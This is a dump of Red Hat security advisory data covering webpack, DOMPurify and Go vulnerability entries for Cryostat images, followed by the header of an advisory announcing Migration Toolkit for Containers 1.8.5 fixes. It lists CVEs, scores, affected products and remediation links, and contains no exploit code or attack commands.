"https://github.com/webpack/webpack/commit/955e057abc6cc83cbc3fa1e1ef67a49758bf5a61", }, { category: "external", summary: "https://github.com/webpack/webpack/security/advisories/GHSA-4vvj-4cpr-p986", url: "https://github.com/webpack/webpack/security/advisories/GHSA-4vvj-4cpr-p986", }, { category: "external", summary: "https://research.securitum.com/xss-in-amp4email-dom-clobbering", url: "https://research.securitum.com/xss-in-amp4email-dom-clobbering", }, { category: "external", summary: "https://scnps.co/papers/sp23_domclob.pdf", url: "https://scnps.co/papers/sp23_domclob.pdf", }, ], release_date: "2024-08-27T17:15:07.967000+00:00", remediations: [ { category: "vendor_fix", date: "2024-10-07T01:12:29+00:00", details: "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-Cryostat-3:cryostat-tech-preview/cryostat-db-rhel8@sha256:94f2ad856ccc1d3efed8871303ac0a0792efe8150ba0e7e1152f02e8e3acc80a_arm64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-db-rhel8@sha256:cde38f98de9a139e0fa7e835dfc1d2c56ee91087cd01da4ce4bc46b06e0fd7ec_amd64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-grafana-dashboard-rhel8@sha256:8ce54e90618eaa45627ed97e55a93e7754006f760b2f2e619c02f93c9acb5ce3_arm64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-grafana-dashboard-rhel8@sha256:944d74356fd1997334e40e2ed60a2d2f3a4730895a4dab0e5952fc8de51edf3a_amd64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-operator-bundle@sha256:82a87b4ee8e5a4ebdb4f3c5df7d3d7ff5e8ebcf4313548072c0dbed08df2eb51_arm64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-operator-bundle@sha256:93d0b7f6a0bb26707fffb1b18485427641711dbc6161effb28b4b5eaee5a612d_amd64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-ose-oauth-proxy-rhel8@sha256:4e8c4c26564bfa6d15cb3dd1ed0bf1a707f0dee78ddd1c0f801acd740f06ab0f_arm64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-ose-oauth-proxy-rhel8@sha256:c38a44a12a45b65045576ab373e7d18641995709c4d330e01c3fe23ad74a280f_amd64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-reports-rhel8@sha256:194e839e5733e70303b38d212362898b03fe0c12765726b159703d718787e7d6_arm64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-reports-rhel8@sha256:2bc3f4475c1eac40cda1528944416f42af49b669fec8762e3dbad40a023f3bb4_amd64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-rhel8-operator@sha256:af720cf07d638057b31dea56cc3514d394dc39461acef8d2573c4b0205c309d7_arm64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-rhel8-operator@sha256:ff17460450719304fff283aeeb2ac59f9644bb2c659d38ea7520fe31b8aff41d_amd64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-rhel8@sha256:180392716b08b100430cddfd46b84c1b5b2a8648d53a36e67e1984359d5bba3b_arm64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-rhel8@sha256:aef0dc11169bf71824ff16a3fe307343cd07522b10e0759912f77c1b1e05b34c_amd64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-storage-rhel8@sha256:5296794a5d38c60165a86671ced7e3812f75e2355d8a6d9721ab89accc93c1a6_amd64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-storage-rhel8@sha256:7e2ec282045e2698b254a26142c38d9923a8fbc0f7e096539df1f9fa86163234_arm64", "8Base-Cryostat-3:cryostat-tech-preview/jfr-datasource-rhel8@sha256:30a0e9843b9b8f11305788baaef33534144dbe04e9b314e04534e6f13967b69f_arm64", "8Base-Cryostat-3:cryostat-tech-preview/jfr-datasource-rhel8@sha256:d6aca1dcf4bee8abfa4f0c674e7cdad49289d2c8bd77e0ccdd44e0e93df66455_amd64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2024:7706", }, { category: "workaround", details: "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", product_ids: [ "8Base-Cryostat-3:cryostat-tech-preview/cryostat-db-rhel8@sha256:94f2ad856ccc1d3efed8871303ac0a0792efe8150ba0e7e1152f02e8e3acc80a_arm64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-db-rhel8@sha256:cde38f98de9a139e0fa7e835dfc1d2c56ee91087cd01da4ce4bc46b06e0fd7ec_amd64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-grafana-dashboard-rhel8@sha256:8ce54e90618eaa45627ed97e55a93e7754006f760b2f2e619c02f93c9acb5ce3_arm64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-grafana-dashboard-rhel8@sha256:944d74356fd1997334e40e2ed60a2d2f3a4730895a4dab0e5952fc8de51edf3a_amd64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-operator-bundle@sha256:82a87b4ee8e5a4ebdb4f3c5df7d3d7ff5e8ebcf4313548072c0dbed08df2eb51_arm64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-operator-bundle@sha256:93d0b7f6a0bb26707fffb1b18485427641711dbc6161effb28b4b5eaee5a612d_amd64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-ose-oauth-proxy-rhel8@sha256:4e8c4c26564bfa6d15cb3dd1ed0bf1a707f0dee78ddd1c0f801acd740f06ab0f_arm64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-ose-oauth-proxy-rhel8@sha256:c38a44a12a45b65045576ab373e7d18641995709c4d330e01c3fe23ad74a280f_amd64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-reports-rhel8@sha256:194e839e5733e70303b38d212362898b03fe0c12765726b159703d718787e7d6_arm64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-reports-rhel8@sha256:2bc3f4475c1eac40cda1528944416f42af49b669fec8762e3dbad40a023f3bb4_amd64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-rhel8-operator@sha256:af720cf07d638057b31dea56cc3514d394dc39461acef8d2573c4b0205c309d7_arm64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-rhel8-operator@sha256:ff17460450719304fff283aeeb2ac59f9644bb2c659d38ea7520fe31b8aff41d_amd64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-rhel8@sha256:180392716b08b100430cddfd46b84c1b5b2a8648d53a36e67e1984359d5bba3b_arm64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-rhel8@sha256:aef0dc11169bf71824ff16a3fe307343cd07522b10e0759912f77c1b1e05b34c_amd64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-storage-rhel8@sha256:5296794a5d38c60165a86671ced7e3812f75e2355d8a6d9721ab89accc93c1a6_amd64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-storage-rhel8@sha256:7e2ec282045e2698b254a26142c38d9923a8fbc0f7e096539df1f9fa86163234_arm64", "8Base-Cryostat-3:cryostat-tech-preview/jfr-datasource-rhel8@sha256:30a0e9843b9b8f11305788baaef33534144dbe04e9b314e04534e6f13967b69f_arm64", "8Base-Cryostat-3:cryostat-tech-preview/jfr-datasource-rhel8@sha256:d6aca1dcf4bee8abfa4f0c674e7cdad49289d2c8bd77e0ccdd44e0e93df66455_amd64", ], }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "NONE", baseScore: 6.1, baseSeverity: "MEDIUM", confidentialityImpact: "LOW", integrityImpact: "LOW", privilegesRequired: "NONE", scope: "CHANGED", userInteraction: "REQUIRED", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", version: "3.1", }, products: [ "8Base-Cryostat-3:cryostat-tech-preview/cryostat-db-rhel8@sha256:94f2ad856ccc1d3efed8871303ac0a0792efe8150ba0e7e1152f02e8e3acc80a_arm64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-db-rhel8@sha256:cde38f98de9a139e0fa7e835dfc1d2c56ee91087cd01da4ce4bc46b06e0fd7ec_amd64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-grafana-dashboard-rhel8@sha256:8ce54e90618eaa45627ed97e55a93e7754006f760b2f2e619c02f93c9acb5ce3_arm64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-grafana-dashboard-rhel8@sha256:944d74356fd1997334e40e2ed60a2d2f3a4730895a4dab0e5952fc8de51edf3a_amd64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-operator-bundle@sha256:82a87b4ee8e5a4ebdb4f3c5df7d3d7ff5e8ebcf4313548072c0dbed08df2eb51_arm64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-operator-bundle@sha256:93d0b7f6a0bb26707fffb1b18485427641711dbc6161effb28b4b5eaee5a612d_amd64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-ose-oauth-proxy-rhel8@sha256:4e8c4c26564bfa6d15cb3dd1ed0bf1a707f0dee78ddd1c0f801acd740f06ab0f_arm64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-ose-oauth-proxy-rhel8@sha256:c38a44a12a45b65045576ab373e7d18641995709c4d330e01c3fe23ad74a280f_amd64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-reports-rhel8@sha256:194e839e5733e70303b38d212362898b03fe0c12765726b159703d718787e7d6_arm64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-reports-rhel8@sha256:2bc3f4475c1eac40cda1528944416f42af49b669fec8762e3dbad40a023f3bb4_amd64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-rhel8-operator@sha256:af720cf07d638057b31dea56cc3514d394dc39461acef8d2573c4b0205c309d7_arm64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-rhel8-operator@sha256:ff17460450719304fff283aeeb2ac59f9644bb2c659d38ea7520fe31b8aff41d_amd64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-rhel8@sha256:180392716b08b100430cddfd46b84c1b5b2a8648d53a36e67e1984359d5bba3b_arm64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-rhel8@sha256:aef0dc11169bf71824ff16a3fe307343cd07522b10e0759912f77c1b1e05b34c_amd64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-storage-rhel8@sha256:5296794a5d38c60165a86671ced7e3812f75e2355d8a6d9721ab89accc93c1a6_amd64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-storage-rhel8@sha256:7e2ec282045e2698b254a26142c38d9923a8fbc0f7e096539df1f9fa86163234_arm64", "8Base-Cryostat-3:cryostat-tech-preview/jfr-datasource-rhel8@sha256:30a0e9843b9b8f11305788baaef33534144dbe04e9b314e04534e6f13967b69f_arm64", "8Base-Cryostat-3:cryostat-tech-preview/jfr-datasource-rhel8@sha256:d6aca1dcf4bee8abfa4f0c674e7cdad49289d2c8bd77e0ccdd44e0e93df66455_amd64", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "webpack: DOM Clobbering vulnerability in AutoPublicPathRuntimeModule", }, { cve: "CVE-2024-45801", cwe: { id: "CWE-1333", name: "Inefficient Regular Expression Complexity", }, discovery_date: "2024-09-16T19:20:09.863249+00:00", ids: [ { system_name: "Red Hat Bugzilla ID", text: "2312631", }, ], notes: [ { category: "description", text: "A flaw was found in DOMPurify. This issue may allow an attacker to use specially-crafted HTML to bypass the depth checking or use Prototype Pollution to weaken the depth check, which can lead to cross site scripting (XSS) attacks.", title: "Vulnerability description", }, { category: "summary", text: "dompurify: XSS vulnerability via prototype pollution", title: "Vulnerability summary", }, { category: "other", text: "The vulnerability in DOMPurify, while significant, is categorized as moderate severity rather than important due to its specific conditions for exploitation. The issue requires not only a sophisticated nesting technique to bypass the depth checks but also the ability to leverage Prototype Pollution to weaken these protections. This makes the attack scenario relatively complex and less likely to be encountered in general use cases. Furthermore, the flaw impacts only certain configurations and usage patterns, thus reducing its immediate risk.", title: "Statement", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-Cryostat-3:cryostat-tech-preview/cryostat-db-rhel8@sha256:94f2ad856ccc1d3efed8871303ac0a0792efe8150ba0e7e1152f02e8e3acc80a_arm64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-db-rhel8@sha256:cde38f98de9a139e0fa7e835dfc1d2c56ee91087cd01da4ce4bc46b06e0fd7ec_amd64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-grafana-dashboard-rhel8@sha256:8ce54e90618eaa45627ed97e55a93e7754006f760b2f2e619c02f93c9acb5ce3_arm64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-grafana-dashboard-rhel8@sha256:944d74356fd1997334e40e2ed60a2d2f3a4730895a4dab0e5952fc8de51edf3a_amd64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-operator-bundle@sha256:82a87b4ee8e5a4ebdb4f3c5df7d3d7ff5e8ebcf4313548072c0dbed08df2eb51_arm64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-operator-bundle@sha256:93d0b7f6a0bb26707fffb1b18485427641711dbc6161effb28b4b5eaee5a612d_amd64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-ose-oauth-proxy-rhel8@sha256:4e8c4c26564bfa6d15cb3dd1ed0bf1a707f0dee78ddd1c0f801acd740f06ab0f_arm64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-ose-oauth-proxy-rhel8@sha256:c38a44a12a45b65045576ab373e7d18641995709c4d330e01c3fe23ad74a280f_amd64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-reports-rhel8@sha256:194e839e5733e70303b38d212362898b03fe0c12765726b159703d718787e7d6_arm64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-reports-rhel8@sha256:2bc3f4475c1eac40cda1528944416f42af49b669fec8762e3dbad40a023f3bb4_amd64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-rhel8-operator@sha256:af720cf07d638057b31dea56cc3514d394dc39461acef8d2573c4b0205c309d7_arm64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-rhel8-operator@sha256:ff17460450719304fff283aeeb2ac59f9644bb2c659d38ea7520fe31b8aff41d_amd64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-rhel8@sha256:180392716b08b100430cddfd46b84c1b5b2a8648d53a36e67e1984359d5bba3b_arm64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-rhel8@sha256:aef0dc11169bf71824ff16a3fe307343cd07522b10e0759912f77c1b1e05b34c_amd64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-storage-rhel8@sha256:5296794a5d38c60165a86671ced7e3812f75e2355d8a6d9721ab89accc93c1a6_amd64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-storage-rhel8@sha256:7e2ec282045e2698b254a26142c38d9923a8fbc0f7e096539df1f9fa86163234_arm64", "8Base-Cryostat-3:cryostat-tech-preview/jfr-datasource-rhel8@sha256:30a0e9843b9b8f11305788baaef33534144dbe04e9b314e04534e6f13967b69f_arm64", "8Base-Cryostat-3:cryostat-tech-preview/jfr-datasource-rhel8@sha256:d6aca1dcf4bee8abfa4f0c674e7cdad49289d2c8bd77e0ccdd44e0e93df66455_amd64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-45801", }, { category: "external", summary: "RHBZ#2312631", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2312631", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-45801", url: "https://www.cve.org/CVERecord?id=CVE-2024-45801", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-45801", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-45801", }, { category: "external", summary: "https://github.com/cure53/DOMPurify/commit/1e520262bf4c66b5efda49e2316d6d1246ca7b21", url: "https://github.com/cure53/DOMPurify/commit/1e520262bf4c66b5efda49e2316d6d1246ca7b21", }, { category: "external", summary: "https://github.com/cure53/DOMPurify/commit/26e1d69ca7f769f5c558619d644d90dd8bf26ebc", url: "https://github.com/cure53/DOMPurify/commit/26e1d69ca7f769f5c558619d644d90dd8bf26ebc", }, { category: "external", summary: "https://github.com/cure53/DOMPurify/security/advisories/GHSA-mmhx-hmjr-r674", url: "https://github.com/cure53/DOMPurify/security/advisories/GHSA-mmhx-hmjr-r674", }, ], release_date: "2024-09-16T19:16:11.080000+00:00", remediations: [ { category: "vendor_fix", date: "2024-10-07T01:12:29+00:00", details: "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-Cryostat-3:cryostat-tech-preview/cryostat-db-rhel8@sha256:94f2ad856ccc1d3efed8871303ac0a0792efe8150ba0e7e1152f02e8e3acc80a_arm64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-db-rhel8@sha256:cde38f98de9a139e0fa7e835dfc1d2c56ee91087cd01da4ce4bc46b06e0fd7ec_amd64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-grafana-dashboard-rhel8@sha256:8ce54e90618eaa45627ed97e55a93e7754006f760b2f2e619c02f93c9acb5ce3_arm64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-grafana-dashboard-rhel8@sha256:944d74356fd1997334e40e2ed60a2d2f3a4730895a4dab0e5952fc8de51edf3a_amd64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-operator-bundle@sha256:82a87b4ee8e5a4ebdb4f3c5df7d3d7ff5e8ebcf4313548072c0dbed08df2eb51_arm64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-operator-bundle@sha256:93d0b7f6a0bb26707fffb1b18485427641711dbc6161effb28b4b5eaee5a612d_amd64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-ose-oauth-proxy-rhel8@sha256:4e8c4c26564bfa6d15cb3dd1ed0bf1a707f0dee78ddd1c0f801acd740f06ab0f_arm64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-ose-oauth-proxy-rhel8@sha256:c38a44a12a45b65045576ab373e7d18641995709c4d330e01c3fe23ad74a280f_amd64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-reports-rhel8@sha256:194e839e5733e70303b38d212362898b03fe0c12765726b159703d718787e7d6_arm64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-reports-rhel8@sha256:2bc3f4475c1eac40cda1528944416f42af49b669fec8762e3dbad40a023f3bb4_amd64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-rhel8-operator@sha256:af720cf07d638057b31dea56cc3514d394dc39461acef8d2573c4b0205c309d7_arm64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-rhel8-operator@sha256:ff17460450719304fff283aeeb2ac59f9644bb2c659d38ea7520fe31b8aff41d_amd64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-rhel8@sha256:180392716b08b100430cddfd46b84c1b5b2a8648d53a36e67e1984359d5bba3b_arm64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-rhel8@sha256:aef0dc11169bf71824ff16a3fe307343cd07522b10e0759912f77c1b1e05b34c_amd64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-storage-rhel8@sha256:5296794a5d38c60165a86671ced7e3812f75e2355d8a6d9721ab89accc93c1a6_amd64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-storage-rhel8@sha256:7e2ec282045e2698b254a26142c38d9923a8fbc0f7e096539df1f9fa86163234_arm64", "8Base-Cryostat-3:cryostat-tech-preview/jfr-datasource-rhel8@sha256:30a0e9843b9b8f11305788baaef33534144dbe04e9b314e04534e6f13967b69f_arm64", "8Base-Cryostat-3:cryostat-tech-preview/jfr-datasource-rhel8@sha256:d6aca1dcf4bee8abfa4f0c674e7cdad49289d2c8bd77e0ccdd44e0e93df66455_amd64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2024:7706", }, { category: "workaround", details: "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", product_ids: [ "8Base-Cryostat-3:cryostat-tech-preview/cryostat-db-rhel8@sha256:94f2ad856ccc1d3efed8871303ac0a0792efe8150ba0e7e1152f02e8e3acc80a_arm64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-db-rhel8@sha256:cde38f98de9a139e0fa7e835dfc1d2c56ee91087cd01da4ce4bc46b06e0fd7ec_amd64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-grafana-dashboard-rhel8@sha256:8ce54e90618eaa45627ed97e55a93e7754006f760b2f2e619c02f93c9acb5ce3_arm64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-grafana-dashboard-rhel8@sha256:944d74356fd1997334e40e2ed60a2d2f3a4730895a4dab0e5952fc8de51edf3a_amd64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-operator-bundle@sha256:82a87b4ee8e5a4ebdb4f3c5df7d3d7ff5e8ebcf4313548072c0dbed08df2eb51_arm64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-operator-bundle@sha256:93d0b7f6a0bb26707fffb1b18485427641711dbc6161effb28b4b5eaee5a612d_amd64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-ose-oauth-proxy-rhel8@sha256:4e8c4c26564bfa6d15cb3dd1ed0bf1a707f0dee78ddd1c0f801acd740f06ab0f_arm64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-ose-oauth-proxy-rhel8@sha256:c38a44a12a45b65045576ab373e7d18641995709c4d330e01c3fe23ad74a280f_amd64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-reports-rhel8@sha256:194e839e5733e70303b38d212362898b03fe0c12765726b159703d718787e7d6_arm64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-reports-rhel8@sha256:2bc3f4475c1eac40cda1528944416f42af49b669fec8762e3dbad40a023f3bb4_amd64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-rhel8-operator@sha256:af720cf07d638057b31dea56cc3514d394dc39461acef8d2573c4b0205c309d7_arm64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-rhel8-operator@sha256:ff17460450719304fff283aeeb2ac59f9644bb2c659d38ea7520fe31b8aff41d_amd64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-rhel8@sha256:180392716b08b100430cddfd46b84c1b5b2a8648d53a36e67e1984359d5bba3b_arm64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-rhel8@sha256:aef0dc11169bf71824ff16a3fe307343cd07522b10e0759912f77c1b1e05b34c_amd64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-storage-rhel8@sha256:5296794a5d38c60165a86671ced7e3812f75e2355d8a6d9721ab89accc93c1a6_amd64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-storage-rhel8@sha256:7e2ec282045e2698b254a26142c38d9923a8fbc0f7e096539df1f9fa86163234_arm64", "8Base-Cryostat-3:cryostat-tech-preview/jfr-datasource-rhel8@sha256:30a0e9843b9b8f11305788baaef33534144dbe04e9b314e04534e6f13967b69f_arm64", "8Base-Cryostat-3:cryostat-tech-preview/jfr-datasource-rhel8@sha256:d6aca1dcf4bee8abfa4f0c674e7cdad49289d2c8bd77e0ccdd44e0e93df66455_amd64", ], }, ], scores: [ { cvss_v3: { attackComplexity: "HIGH", attackVector: "NETWORK", availabilityImpact: "LOW", baseScore: 7, baseSeverity: "HIGH", confidentialityImpact: "LOW", integrityImpact: "HIGH", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:H/A:L", version: "3.1", }, products: [ "8Base-Cryostat-3:cryostat-tech-preview/cryostat-db-rhel8@sha256:94f2ad856ccc1d3efed8871303ac0a0792efe8150ba0e7e1152f02e8e3acc80a_arm64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-db-rhel8@sha256:cde38f98de9a139e0fa7e835dfc1d2c56ee91087cd01da4ce4bc46b06e0fd7ec_amd64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-grafana-dashboard-rhel8@sha256:8ce54e90618eaa45627ed97e55a93e7754006f760b2f2e619c02f93c9acb5ce3_arm64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-grafana-dashboard-rhel8@sha256:944d74356fd1997334e40e2ed60a2d2f3a4730895a4dab0e5952fc8de51edf3a_amd64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-operator-bundle@sha256:82a87b4ee8e5a4ebdb4f3c5df7d3d7ff5e8ebcf4313548072c0dbed08df2eb51_arm64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-operator-bundle@sha256:93d0b7f6a0bb26707fffb1b18485427641711dbc6161effb28b4b5eaee5a612d_amd64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-ose-oauth-proxy-rhel8@sha256:4e8c4c26564bfa6d15cb3dd1ed0bf1a707f0dee78ddd1c0f801acd740f06ab0f_arm64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-ose-oauth-proxy-rhel8@sha256:c38a44a12a45b65045576ab373e7d18641995709c4d330e01c3fe23ad74a280f_amd64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-reports-rhel8@sha256:194e839e5733e70303b38d212362898b03fe0c12765726b159703d718787e7d6_arm64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-reports-rhel8@sha256:2bc3f4475c1eac40cda1528944416f42af49b669fec8762e3dbad40a023f3bb4_amd64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-rhel8-operator@sha256:af720cf07d638057b31dea56cc3514d394dc39461acef8d2573c4b0205c309d7_arm64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-rhel8-operator@sha256:ff17460450719304fff283aeeb2ac59f9644bb2c659d38ea7520fe31b8aff41d_amd64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-rhel8@sha256:180392716b08b100430cddfd46b84c1b5b2a8648d53a36e67e1984359d5bba3b_arm64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-rhel8@sha256:aef0dc11169bf71824ff16a3fe307343cd07522b10e0759912f77c1b1e05b34c_amd64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-storage-rhel8@sha256:5296794a5d38c60165a86671ced7e3812f75e2355d8a6d9721ab89accc93c1a6_amd64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-storage-rhel8@sha256:7e2ec282045e2698b254a26142c38d9923a8fbc0f7e096539df1f9fa86163234_arm64", "8Base-Cryostat-3:cryostat-tech-preview/jfr-datasource-rhel8@sha256:30a0e9843b9b8f11305788baaef33534144dbe04e9b314e04534e6f13967b69f_arm64", "8Base-Cryostat-3:cryostat-tech-preview/jfr-datasource-rhel8@sha256:d6aca1dcf4bee8abfa4f0c674e7cdad49289d2c8bd77e0ccdd44e0e93df66455_amd64", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "dompurify: XSS vulnerability via prototype pollution", }, ], }
rhsa-2024_10906
Vulnerability from csaf_redhat
Published
2024-12-10 01:37
Modified
2024-12-18 04:37
Summary
Red Hat Security Advisory: Migration Toolkit for Containers (MTC) 1.8.5 security and bug fix update
Notes
Topic
The Migration Toolkit for Containers (MTC) 1.8.5 is now available.
Red Hat Product Security has rated this update as having a security impact
of Important. A Common Vulnerability Scoring System (CVSS) base score,
which gives a detailed severity rating, is available for each vulnerability
from the CVE link(s) in the References section.
Details
The Migration Toolkit for Containers (MTC) enables you to migrate Kubernetes resources, persistent volume data, and internal container images between OpenShift Container Platform clusters, using the MTC web console or the Kubernetes API.
Security Fix(es) from Bugzilla:
* encoding/gob: golang: Calling Decoder.Decode on a message which contains deeply nested structures can cause a panic due to stack exhaustion (CVE-2024-34156)
* body-parser: Denial of Service Vulnerability in body-parser (CVE-2024-45590)
* golang: net/netip: Unexpected behavior from Is methods for IPv4-mapped IPv6 addresses (CVE-2024-24790)
* net/http: Denial of service due to improper 100-continue handling in net/http (CVE-2024-24791)
* webpack: DOM Clobbering vulnerability in AutoPublicPathRuntimeModule (CVE-2024-43788)
* go/parser: golang: Calling any of the Parse functions containing deeply nested literals can cause a panic/stack exhaustion (CVE-2024-34155)
* go/build/constraint: golang: Calling Parse on a "// +build" build tag line with deeply nested expressions can cause a panic due to stack exhaustion (CVE-2024-34158)
* path-to-regexp: Backtracking regular expressions cause ReDoS (CVE-2024-45296)
* express: Improper Input Handling in Express Redirects (CVE-2024-43796)
* send: Code Execution Vulnerability in Send Library (CVE-2024-43799)
* serve-static: Improper Sanitization in serve-static (CVE-2024-43800)
For more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.
Terms of Use
This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.
